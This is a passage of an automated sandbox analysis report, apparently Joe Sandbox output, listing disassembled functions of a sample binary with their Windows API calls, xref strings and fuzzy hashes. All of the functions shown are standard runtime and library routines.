GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFDA55D4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDA55D4E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDA55D519B

Strings

csm, xrefs: 00007FFDA55D4E99
csm, xrefs: 00007FFDA55D4DB9
csm, xrefs: 00007FFDA55D4E1B

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 2f58e4dc9fe4aa42e364bc6341b378f6bf0ef92de018b8b917c81c0699ca258e
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: F7E1BE37A097CACAEB22EF64D4A03AD77A0EB56B48F150135DA8C47756DF38E481C705

Function 00007FFDA55D95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D95CB
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D9601
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D962E
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D963F
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D9650
SetLastError.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D966B

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: 9b67b44bbd2fe2b9364ae90a8078e089ec1c0ce4b2f3e110e9e482db4a0f8290
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: CF113E6BF0E28A85FA5BEF21557133922629F46FB0F444735E83E067C7EE2CA4518708

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFDA55D7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFDA55D7F4D
GetProcAddress.KERNEL32 ref: 00007FFDA55D7F63
FreeLibrary.KERNEL32 ref: 00007FFDA55D7F8A

Strings

mscoree.dll, xrefs: 00007FFDA55D7F44
CorExitProcess, xrefs: 00007FFDA55D7F5C

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: fe33a975cf860619d53e14553c80f2f3779049f800c9c6428b61fef2139097bc
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: F3F0A46BB1A60AC1EA22CF20E4643396320AF86B61F440235D96E453E9CF2CE056C304

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

CorExitProcess, xrefs: 000000014000852A
mscoree.dll, xrefs: 0000000140008518

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFDA55D40D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFDA55D41F7
__AdjustPointer.LIBCMT ref: 00007FFDA55D4242

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: 6d97b1d9f2fa4a5d9a4b5bd54b49e56a691506c75562b9e1337ad1f19546770f
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: DBB18E2BB0B6CAC1EA66DF95946033D6390AF56F84F098435DE4D0778BDEACE4918308

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFDA55DFB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDA55DFB7C
_set_statfp.LIBCMT ref: 00007FFDA55DFB97
_set_statfp.LIBCMT ref: 00007FFDA55DFBB3
_set_statfp.LIBCMT ref: 00007FFDA55DFBEF

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 6619d257d44266e13fb819b49d957750557f6ae76f6f0bb94f45c80f64578576
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 75112B3BF0DA9F81F7568994E43533812406F9BB70F140230E96F063EBCE2CA840C109

Function 00007FFDA55D9684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96A3
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96C2
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96EA
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D96FB
FlsSetValue.KERNEL32(?,?,?,00007FFDA55D766F,?,?,00000000,00007FFDA55D790A,?,?,?,?,?,00007FFDA55D7896), ref: 00007FFDA55D970C

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 0a88dea5139bd8747a847ab3af8f0223fc8544491036e73ef614548d3c8b71f9
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: FC115E6BF0E28A85FA5AEF25557137961625F46FF0F544334D83D067C7FE2CA4418608

Function 00007FFDA55D9518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFDA55D9529
FlsSetValue.KERNEL32 ref: 00007FFDA55D9548
FlsSetValue.KERNEL32 ref: 00007FFDA55D9570
FlsSetValue.KERNEL32 ref: 00007FFDA55D9581
FlsSetValue.KERNEL32 ref: 00007FFDA55D9592

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: a16a91b3949bfc418f4484dcf83f575ba63b20a2932241ab5982c23f43591cc5
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 2711D79BB0A28B85F96AEE21547137912524F46FB0E140634D83E097D3ED2CB4518A08

Function 00007FFDA55D5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDA55D54B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDA55D5503

Strings

RCC, xrefs: 00007FFDA55D54D4
MOC, xrefs: 00007FFDA55D54CC

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: f56cc64be419c5f6bf9cc577d2628cf76914609214f53f5274967107c79b6bfd
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: AD91BF77B09789CAE752CF64E4903AD7BA0FB16B88F10412AEA4D07B56DF38D191CB04

Function 00007FFDA55D3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D3A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFDA55D3AFA
RtlUnwindEx.KERNEL32 ref: 00007FFDA55D3B54

Strings

csm, xrefs: 00007FFDA55D3AE1

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: 543df459e81ee9e02025d6760ad40fb2a42bed6758b7ba51cefff8e69516939e
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 2F51B03BB1A68ACAEB15CF15E464B387791EB41F88F128131DA4A4778ADF7CE841C704

Function 00007FFDA55D59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D59F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFDA55D5AD8

Strings

csm, xrefs: 00007FFDA55D5A12
csm, xrefs: 00007FFDA55D5B2A

Memory Dump Source

